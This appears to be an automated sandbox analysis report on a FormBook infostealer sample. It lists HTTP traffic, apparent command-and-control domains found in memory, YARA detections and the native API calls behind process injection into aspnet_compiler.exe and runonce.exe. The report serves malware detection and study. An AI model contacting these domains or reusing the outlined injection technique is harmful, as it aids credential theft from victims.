                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XDJ4t9fJDGEbuGpDv6rowvavkHdifMrsguXabwoigYbxcsew2ZBxwik858aUhJAcSk4lipN8XbmTv8CzTxaDEWTJdKRnBxO1uKIPHwp%2BPShmftU0bA0gMWr2yCuXjsCmcudoAZEpVNo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc755fc641f24-DENContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=45267&min_rtt=45267&rtt_var=22633&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=834&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3C47v6xVFeyrXOHDKXFOPsf0LtZz%2B5TspCCISXS9jFJ7JgE2JDCywdf8n37XJb4uXmzWsVjYQNyKBdzXqlW9SuTNinIxi93WEtsIGIO%2BZwozaQO7ByJ2pqW8iQhCn7VL9BsSSmxaHk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc765af69a316-YULContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=17436&min_rtt=17436&rtt_var=8718&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=854&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GaguXIo1giGPZq0Ynr5Weeu4WFtYkxRlErEUlIu6MAsfbEOEhkIFRrPzhvdutKaJF3%2FoNObu6TycrQn48gmLFW3u%2BiE3pqSqP4VnpMigD1wpse3Jdg5E8TQUB6rWYCOEEtX9oH5T%2FQo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc77948e97651-SEAContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=67126&min_rtt=67126&rtt_var=33563&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1867&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 86 16 7a 06 c8 4a f4 61 86 ea 43 1d 04 00 cb e6 d9 01 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzzJaC0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:36:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Goc7gNz1SRjAH78clOCzjBBrB3%2Bxg77pP7%2BmJCQohbbyoE3Odkq3%2B3DryNsHEKDEoi4nuX5gm%2BFS%2BNQ6dp4eZCTGoXAxzJoOAUgrG2OZR%2BiobkJAujjN3XrbzCd3eDtRPw9auvB6onk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fc78998554c94-MSPalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=32744&min_rtt=32744&rtt_var=16372&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=572&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:36:33 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Tue, 18 Feb 2025 17:36:36 GMTEtag: "6746afef-94"Server: nginxX-Cache: BYPASSConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: runonce.exe, 00000007.00000002.2624897097.00000000052C8000.00000004.10000000.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2623271598.0000000003118000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: zk0NoejtsplNyT.exe, 0000000A.00000002.2624771896.0000000004E9B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kjuw.party
                Source: zk0NoejtsplNyT.exe, 0000000A.00000002.2624771896.0000000004E9B000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kjuw.party/e0jv/
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runonce.exe, 00000007.00000002.2621389939.0000000000719000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: runonce.exe, 00000007.00000003.2089587672.00000000075D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: runonce.exe, 00000007.00000003.2095939838.00000000075E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: zk0NoejtsplNyT.exe, 0000000A.00000002.2623271598.0000000002F86000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.seasay.xyz/c9ts/?rTuLCZ7=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExA
                Source: runonce.exe, 00000007.00000002.2624897097.0000000004FA4000.00000004.10000000.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2623271598.0000000002DF4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2205653441.0000000037054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&amp;topId=86884/vhr7/
                Source: runonce.exe, 00000007.00000002.2624897097.0000000004FA4000.00000004.10000000.00040000.00000000.sdmp, zk0NoejtsplNyT.exe, 0000000A.00000002.2623271598.0000000002DF4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2205653441.0000000037054000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.2622831445.0000000000E40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896210182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1898549752.0000000002F80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1896911087.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2624771896.0000000004E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2622738562.0000000000DF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2621242417.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2622801830.0000000003C30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                .NET source code contains very large array initializations
                Source: uI1A364y2P.exe, -Module-.csLarge array initialization: _003CModule_003E: array initializer size 74016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_0042CAA3 NtClose,4_2_0042CAA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2B60 NtClose,LdrInitializeThunk,4_2_017A2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_017A2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_017A2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A35C0 NtCreateMutant,LdrInitializeThunk,4_2_017A35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A4340 NtSetContextThread,4_2_017A4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A4650 NtSuspendThread,4_2_017A4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2BF0 NtAllocateVirtualMemory,4_2_017A2BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2BE0 NtQueryValueKey,4_2_017A2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2BA0 NtEnumerateValueKey,4_2_017A2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2B80 NtQueryInformationFile,4_2_017A2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2AF0 NtWriteFile,4_2_017A2AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2AD0 NtReadFile,4_2_017A2AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2AB0 NtWaitForSingleObject,4_2_017A2AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2D30 NtUnmapViewOfSection,4_2_017A2D30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2D10 NtMapViewOfSection,4_2_017A2D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2D00 NtSetInformationFile,4_2_017A2D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2DD0 NtDelayExecution,4_2_017A2DD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2DB0 NtEnumerateKey,4_2_017A2DB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2C60 NtCreateKey,4_2_017A2C60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2C00 NtQueryInformationProcess,4_2_017A2C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2CF0 NtOpenProcess,4_2_017A2CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2CC0 NtQueryVirtualMemory,4_2_017A2CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2CA0 NtQueryInformationToken,4_2_017A2CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2F60 NtCreateProcessEx,4_2_017A2F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2F30 NtCreateSection,4_2_017A2F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2FE0 NtCreateFile,4_2_017A2FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2FB0 NtResumeThread,4_2_017A2FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2FA0 NtQuerySection,4_2_017A2FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2F90 NtProtectVirtualMemory,4_2_017A2F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2E30 NtWriteVirtualMemory,4_2_017A2E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2EE0 NtQueueApcThread,4_2_017A2EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2EA0 NtAdjustPrivilegesToken,4_2_017A2EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A2E80 NtReadVirtualMemory,4_2_017A2E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A3010 NtOpenDirectoryObject,4_2_017A3010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A3090 NtSetValueKey,4_2_017A3090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A39B0 NtGetContextThread,4_2_017A39B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A3D70 NtOpenThread,4_2_017A3D70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_017A3D10 NtOpenProcessToken,4_2_017A3D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04604650 NtSuspendThread,LdrInitializeThunk,7_2_04604650
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04604340 NtSetContextThread,LdrInitializeThunk,7_2_04604340
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602C60 NtCreateKey,LdrInitializeThunk,7_2_04602C60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04602C70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04602CA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04602D30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04602D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04602DF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602DD0 NtDelayExecution,LdrInitializeThunk,7_2_04602DD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04602EE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04602E80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602F30 NtCreateSection,LdrInitializeThunk,7_2_04602F30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602FE0 NtCreateFile,LdrInitializeThunk,7_2_04602FE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602FB0 NtResumeThread,LdrInitializeThunk,7_2_04602FB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602AF0 NtWriteFile,LdrInitializeThunk,7_2_04602AF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602AD0 NtReadFile,LdrInitializeThunk,7_2_04602AD0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602B60 NtClose,LdrInitializeThunk,7_2_04602B60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04602BE0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04602BF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04602BA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046035C0 NtCreateMutant,LdrInitializeThunk,7_2_046035C0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_046039B0 NtGetContextThread,LdrInitializeThunk,7_2_046039B0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602C00 NtQueryInformationProcess,7_2_04602C00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602CF0 NtOpenProcess,7_2_04602CF0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602CC0 NtQueryVirtualMemory,7_2_04602CC0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602D00 NtSetInformationFile,7_2_04602D00
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602DB0 NtEnumerateKey,7_2_04602DB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602E30 NtWriteVirtualMemory,7_2_04602E30
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602EA0 NtAdjustPrivilegesToken,7_2_04602EA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602F60 NtCreateProcessEx,7_2_04602F60
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602FA0 NtQuerySection,7_2_04602FA0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602F90 NtProtectVirtualMemory,7_2_04602F90
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602AB0 NtWaitForSingleObject,7_2_04602AB0
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04602B80 NtQueryInformationFile,7_2_04602B80
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04603010 NtOpenDirectoryObject,7_2_04603010
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04603090 NtSetValueKey,7_2_04603090
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04603D70 NtOpenThread,7_2_04603D70
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_04603D10 NtOpenProcessToken,7_2_04603D10
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379510 NtCreateFile,7_2_00379510
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379680 NtReadFile,7_2_00379680
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379780 NtDeleteFile,7_2_00379780
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379820 NtClose,7_2_00379820
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_00379980 NtAllocateVirtualMemory,7_2_00379980
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043EF2CF NtReadVirtualMemory,7_2_043EF2CF
                Source: C:\Windows\SysWOW64\runonce.exeCode function: 7_2_043EF8C4 NtMapViewOfSection,7_2_043EF8C4
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011791201_2_01179120
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011745981_2_01174598
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011795A81_2_011795A8
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011799F81_2_011799F8
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_0117A4261_2_0117A426
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011708481_2_01170848
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_0117B8781_2_0117B878
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_0117BC9E1_2_0117BC9E
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011723381_2_01172338
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_0117BBE81_2_0117BBE8
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_0117C3E81_2_0117C3E8
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011736881_2_01173688
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_0117B2F01_2_0117B2F0
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_0117BD091_2_0117BD09
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011769381_2_01176938
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011731201_2_01173120
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011769281_2_01176928
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_0117795A1_2_0117795A
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011795A51_2_011795A5
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011779A01_2_011779A0
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011774101_2_01177410
                Source: C:\Users\user\Desktop\uI1A364y2P.exeCode function: 1_2_011708001_2_01170800
